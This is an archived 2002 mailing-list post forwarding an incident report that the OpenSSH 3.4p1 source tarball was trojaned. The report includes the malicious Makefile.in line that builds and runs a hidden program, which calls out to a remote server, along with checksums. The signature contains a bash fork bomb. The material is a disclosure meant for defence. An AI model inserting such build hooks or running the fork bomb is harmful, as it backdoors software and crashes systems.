[iwar] [fc:openssh-3.4p1.tar.gz.distribution.recently.trojaned]

From: Fred Cohen (fc@all.net)
Date: 2002-08-01 19:45:37

Next message: Fred Cohen: "[iwar] [fc:IG.Finds.'Sensitive'.Data.Still.On.DOD.Web.Sites]"
Previous message: Fred Cohen: "[iwar] [fc:The.web's.most.wanted]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Message-Id: <200208020245.g722jcY02589@red.all.net>
To: iwar@onelist.com (Information Warfare Mailing List)
Organization: I'm not allowed to say
From: Fred Cohen <fc@all.net>
Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com
Precedence: bulk
Date: Thu, 1 Aug 2002 19:45:37 -0700 (PDT)
Subject: [iwar] [fc:openssh-3.4p1.tar.gz.distribution.recently.trojaned]
Reply-To: iwar@yahoogroups.com
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

From
<a href="http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security">http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security>

----- Forwarded message from Edwin Groothuis &lt;<a href="mailto:edwin@mavetju.org?Subject=Re:%20openssh-3.4p1.tar.gz%20distribution%20recently%20trojaned%2526In-Reply-To=%2526lt;3D49198F.8613D352@clavister.com">edwin@mavetju.org</a> 
-----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis &lt;<a href="mailto:edwin@mavetju.org?Subject=Re:%20openssh-3.4p1.tar.gz%20distribution%20recently%20trojaned%2526In-Reply-To=%2526lt;3D49198F.8613D352@clavister.com">edwin@mavetju.org</a>
To: <a href="mailto:incidents@securityfocus.com?Subject=Re:%20openssh-3.4p1.tar.gz%20distribution%20recently%20trojaned%2526In-Reply-To=%2526lt;3D49198F.8613D352@clavister.com">incidents@securityfocus.com</a>
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package op ftp.openbsd.org
(and probably all its mirrors now) it trojaned:

    ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to
<a href="mailto:deraadt@openbsd.org?Subject=Re:%20openssh-3.4p1.tar.gz%20distribution%20recently%20trojaned%2526In-Reply-To=%2526lt;3D49198F.8613D352@clavister.com">deraadt@openbsd.org</a> 
and via irc.openprojects.org/#openbsd)


The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
 all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-testbf-test.out; sh
./bf-test.out &amp;

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on 203.62.158.32:6667 (web.snsonline.net).
  
[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
    MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin

-- 
Edwin Groothuis      |            Personal website: http://www.MavEtJu.org
<a href="mailto:edwin@mavetju.org?Subject=Re:%20openssh-3.4p1.tar.gz%20distribution%20recently%20trojaned%2526In-Reply-To=%2526lt;3D49198F.8613D352@clavister.com">edwin@mavetju.org</a> 
   |    Weblog: http://www.mavetju.org/weblog/weblog.php 

bash$ :(){ :|:&amp;};:   | Interested in MUDs? http://www.FatalDimensions.org/

------------------
http://all.net/ 

Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/

Next message: Fred Cohen: "[iwar] [fc:IG.Finds.'Sensitive'.Data.Still.On.DOD.Web.Sites]"
Previous message: Fred Cohen: "[iwar] [fc:The.web's.most.wanted]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.2 : 2002-10-01 06:44:32 PDT